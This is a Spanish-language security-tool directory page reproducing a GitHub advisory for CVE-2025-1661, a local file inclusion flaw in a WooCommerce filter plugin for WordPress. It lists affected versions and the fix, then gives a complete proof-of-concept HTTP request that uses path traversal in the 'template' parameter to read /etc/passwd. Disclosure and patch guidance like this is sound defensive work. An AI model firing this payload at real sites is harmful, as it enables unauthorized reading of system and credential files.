Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional for WooCommerce, el plugin para WordPress, es vulnerable a Inclusión Local de Archivos (LFI) | Kitploit
Herramientas/GitHubGitHub/muhammadwaseem29/cve-2025-1661
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubmuhammadwaseem29/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional for WooCommerce, el plugin para WordPress, es vulnerable a Inclusión Local de Archivos (LFI)

Ver Repositorio
1hace 1 añoAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1661 - Inclusión Local de Archivos (LFI) no autenticada en HUSKY – Products Filter Professional for WooCommerce

Descripción

El complemento HUSKY – Products Filter Professional for WooCommerce para WordPress es vulnerable a Inclusión Local de Archivos (LFI) en todas las versiones hasta la 1.3.6.5 inclusive mediante el parámetro template de la acción AJAX woof_text_search.

Esto permite a atacantes no autenticados incluir y ejecutar archivos arbitrarios en el servidor, lo que potencialmente puede llevar a:

  • Evadir controles de acceso
  • Extraer datos sensibles
  • Ejecución Remota de Código (RCE) si se cumplen ciertas condiciones (por ejemplo, la carga de tipos de archivo "seguros")

Gravedad: Crítica

  • CVSS Score: 9.8 (Crítica)
  • CWE ID: CWE-22 (Path Traversal)
  • EPS Score: 0.00061
  • Versiones Afectadas

    • Vulnerable: <= 1.3.6.5
    • Versión Parcheada: 1.3.6.6

    Remediación

    Actualice a la versión 1.3.6.6 o a una versión parcheada más reciente.


    Prueba de Concepto (PoC)

    Pasos para Reproducir

    1. Visite el sitio web objetivo.
    2. Capture la solicitud usando Burp Suite.
    3. Modifique el método de solicitud a POST y agregue la siguiente carga útil:
    root@kitploit:~
    POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
    Host: TARGET_SITE_HERE
    Cache-Control: max-age=0
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Cookie: YOUR_SESSION_COOKIE_HERE
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 24
    
    action=woof_text_search&
    

    IntercomVulnChecker Screenshot 4. Si tiene éxito, el servidor devolverá el contenido de /etc/passwd. 5. Esto se puede utilizar para extraer otros archivos sensibles del servidor.


    Referencias

    • Aviso de Wordfence
    • Código del Plugin de WordPress
    • Informe CVE

    Descargo de Responsabilidad

    Este PoC es solo con fines educativos y de investigación. Realizar pruebas no autorizadas contra sistemas sin permiso es ilegal y poco ético. Siempre busque autorización explícita antes de realizar cualquier prueba de seguridad.

    Descargar herramienta